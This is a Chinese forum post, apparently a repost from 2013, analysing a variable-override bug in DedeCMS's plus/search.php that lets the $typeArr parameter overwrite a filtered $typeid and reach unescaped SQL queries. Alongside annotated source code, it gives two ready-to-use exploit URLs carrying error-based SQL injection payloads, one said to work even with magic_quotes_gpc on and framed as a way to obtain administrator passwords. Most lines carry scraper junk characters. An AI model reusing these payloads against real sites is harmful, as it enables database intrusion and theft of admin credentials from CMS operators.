微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
8 F3 H; ~& g! X作者: c4rp3nt3r@0x50sec.org
' W! O* D! `/ a1 J7 hDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.- H4 v( \+ |0 a* }4 ]# j
+ F) w( q9 o q. n8 X, f
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.' j* |7 j8 a K9 J' W, @
& x- h" h+ H( e6 \. B! b2 ]! ?============
D5 K, y" u* y ) z* s4 k) m0 t
; `; P5 `# W; Y* K, IDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
1 Z, a, f) O, b, E; V0 L
6 @4 M: Y- u! [6 r; W0 g; arequire_once(dirname(__FILE__).”/../include/common.inc.php”);
# r, h% Z7 h$ d2 _& Z3 arequire_once(DEDEINC.”/arc.searchview.class.php”);# ?/ O& w1 X4 U6 t+ F% O F
" ~: O/ C" U( V& A# J
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
& d, J5 w2 r3 |4 d. S0 ?$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
# ]7 [- f$ r6 S1 t6 b# k& a( _) @$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;; {3 C" j. r( o$ Y: g
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
: h; v+ }; l% x: _$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;5 [0 R& m% F% V2 u( p6 l) U
! }5 y6 N) |1 f3 S
if(!isset($orderby)) $orderby=”;
2 h. U0 i- I* u% k) W* a! ~else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
% `" c0 B6 K, R
6 ~4 S' T4 S# W" D) W
u% m3 }3 T- D$ Q/ wif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
% G9 y5 @% }* f7 H2 Melse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);8 i6 F$ d: ]4 T$ ^4 t
) _6 R5 k, ^" Q" O# U3 z0 w( }
if(!isset($keyword)){
& p$ z7 Z2 C5 k/ u! I; ] if(!isset($q)) $q = ”;2 y" \7 [ J3 e* ]3 o
$keyword=$q;
0 {* e' _ C7 g2 B2 I}' l" S9 {, T* f: Y. P% {' N
; E* _; T7 Q8 E6 B* m2 m7 K( p$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));+ s4 H1 v f/ Y1 S% @" p
# {6 P3 U4 F' C
//查找栏目信息; `* R5 H# a: S2 P$ q
if(empty($typeid))
/ h. A/ V& I7 A6 q9 @# J4 Z: \{$ I5 b3 r6 _2 C! a2 C0 A
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
) a2 R$ k+ C6 m9 K* x5 | if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
/ I3 G: s! u; { I3 A+ l {) Z- F4 C# z) K; L6 ~, y
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
/ f9 Z+ {3 U! w. H! K6 @! b fwrite($fp, “<”.”?php\r\n”);3 y, @* X7 F8 o9 D! @+ Z& ~( M% j
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
7 F |/ C# g y$ ~3 d $dsql->Execute();
3 \+ `/ Z% s8 ]( b0 W1 ] while($row = $dsql->GetArray())
N2 _- H/ d( W! b {$ h/ q8 p7 Q6 M+ C' N# c
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);+ C4 C2 I$ p+ I' w0 j! P. | x
}7 j' ^( n4 \% G2 V, `0 Y( ?7 V
fwrite($fp, ‘?’.'>’);) ^1 {* |; C0 a) r& \ p( Y
fclose($fp);
! v& E9 U' A% y4 M! N9 n' }- Z }6 V2 H0 ^' j& _& R+ d# }
//引入栏目缓存并看关键字是否有相关栏目内容1 v* U9 H1 K, Q) D- ^( l8 p# ]* w
require_once($typenameCacheFile);; Y0 j1 M# Q: H! H' Y% A2 M$ U
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
# `4 _$ w K* J, N/ t//
; y+ }/ }) e+ h2 T j2 M if(isset($typeArr) && is_array($typeArr))- S! C/ g! z+ m1 @: X- d) S
{
+ ]$ U1 q" v5 r5 K foreach($typeArr as $id=>$typename), m d9 B2 j, e& `% z
{
5 n2 l/ T* I2 l' T B 2 ^/ c6 J- c& ~, p6 z
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
* F) p1 e1 g. l if($keyword != $keywordn)( H$ a- Y+ i# O; y1 W' W! R
{
^+ Z4 z4 [# {5 W; }2 l7 ? $keyword = $keywordn;
8 p' ], q& u+ F" H ? <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
u7 X/ H" O" f/ k! w1 N K+ o break;
: O: k7 `- v% x+ n9 r }+ `6 P) `4 j( u& M7 _6 T0 M: `1 g8 m
}
) t! q/ o0 s T! G/ U }
' ?5 r4 a! J C; v. r}
# |* ^# y+ N2 c0 S7 C! T然后plus/search.php文件下面定义了一个 Search类的对象 .
. w9 O* o `6 D+ `7 ~在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
) F. e. I2 m0 K r3 z, U+ d/ d. n$this->TypeLink = new TypeLink($typeid);
6 ]- i5 f e3 ]- M' [# r
& t* n3 w% N3 s8 M [+ uTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句./ p' Z' ^' Z* B- f# l
3 d: e9 O% h! f% X. L, Kclass TypeLink7 V! m4 d) A! W. e& f
{2 G- o% x. @0 F
var $typeDir;
: S8 ]1 [6 z8 z9 \ var $dsql;
$ o( S- F# i# V+ w k- S5 b3 ]& } var $TypeID;7 Z' ?' n+ {( t; m' @, N: N
var $baseDir;
) f3 \) X5 \$ P: L1 c7 y& R; Y var $modDir;
: Y) ]6 l! G* l, I8 c0 T+ y$ s/ r var $indexUrl;' ?5 J' t P% x5 J4 ^, t7 S N
var $indexName;
$ b. e& H$ ~1 V2 o7 R3 c var $TypeInfos;$ V/ w. ~! J7 u
var $SplitSymbol;. v5 L1 R& y. s2 @; T- Z4 y* A
var $valuePosition;) f! G/ Y5 j" @0 x/ H% e
var $valuePositionName;
5 l! C4 }' }& p2 v+ A: e var $OptionArrayList;//构造函数///////- E, `, o( T7 P* j4 I/ |
//php5构造函数1 e; G* l* ~- a" E* L( y" L0 p' h1 ?
function __construct($typeid)
- C* u/ h. A6 p$ N {
8 x. W$ a* }3 ^ $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
2 f$ d' ~# w# b8 T3 D7 c+ X $this->indexName = $GLOBALS['cfg_indexname'];9 c: X8 }! g; H5 a: e
$this->baseDir = $GLOBALS['cfg_basedir'];0 l9 F% ?7 w' b+ _% L4 a. K& _7 z; G
$this->modDir = $GLOBALS['cfg_templets_dir'];
5 H: }, [2 C' b. g( R $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];* ?. W9 {7 q! X4 Y, y" b6 b2 ?7 w
$this->dsql = $GLOBALS['dsql'];
, A6 o, {" ?& ~2 b; P/ W $this->TypeID = $typeid;- |" q4 M9 k" w% o0 K
$this->valuePosition = ”;
6 ^, r' o8 M# A _ e- D5 z { $this->valuePositionName = ”;
) ?4 W, D/ ~3 B $this->typeDir = ”;
+ U- y2 |( V5 m% v( R; @+ v" Z% [ $this->OptionArrayList = ”;5 g# p3 B9 I, N$ |1 w8 O6 J `
: m f. B- ^) Z3 W" y7 b- y6 F# P
//载入类目信息+ i4 f+ a. T% ^' T- H9 M2 A* }
8 A- z/ L( D% H+ o; g
<font color=”Red”>$query = “SELECT tp.*,ch.typename as8 W* a- Q: |/ N7 f y' ^0 d. s
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
; J0 D) t4 S- ^# t, V* B# J`#@__channeltype` ch
+ \* j; K M4 Q* T( f on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
) \/ [5 K; A& ]2 S1 W) G
- m- ]& @2 m7 S0 _4 D( \ l if($typeid > 0)! D" Q" R! [0 L% J8 y% n+ F. \) p+ L
{
! B0 z1 L5 G2 w; Y $this->TypeInfos = $this->dsql->GetOne($query);
E( u% Y$ C; J( s2 O利用代码一 需要 即使magic_quotes_gpc = Off! _$ D# H" g- p' C6 k; i
0 X1 D ?) s3 A6 Qwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
) i/ k2 j4 a% `# l2 ~
- G* e" e, F2 U$ M这只是其中一个利用代码… Search 类的构造函数再往下
" c% `6 k# i9 Y + E1 i& `, L v8 D
……省略
$ R z8 l, b! ~* S- g" n& a' T$this->TypeID = $typeid;
* y ?5 u( L% k. F* P! C……省略
. z1 g/ o/ _4 L# h1 Aif($this->TypeID==”0″){
2 O C) Z- u+ l4 _ $this->ChannelTypeid=1;
9 F3 |7 n1 B% Z- Q" K3 p5 C) H }else{
* f* J8 E) b q $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
" p z6 L: ^2 L7 Y//现在不鸡肋了吧亲…& z" |" v+ N' f: R
$this->ChannelTypeid=$row['channeltype'];
5 O' e; k: @/ [/ [" o " I2 o$ D/ I/ r! x8 b; e" N" H5 k
}
% U( s% ]0 A( q7 N利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
( Z/ X( |" I e% O7 A; i& n
: Z) C* @7 A% z. k3 \9 vwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
7 s% A* N) O6 [ / s9 v Q0 }& ?) C- {* h
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
; w* H" f! b& X' | |
发表于 2013-1-19 08:18:56
收藏
支持
反对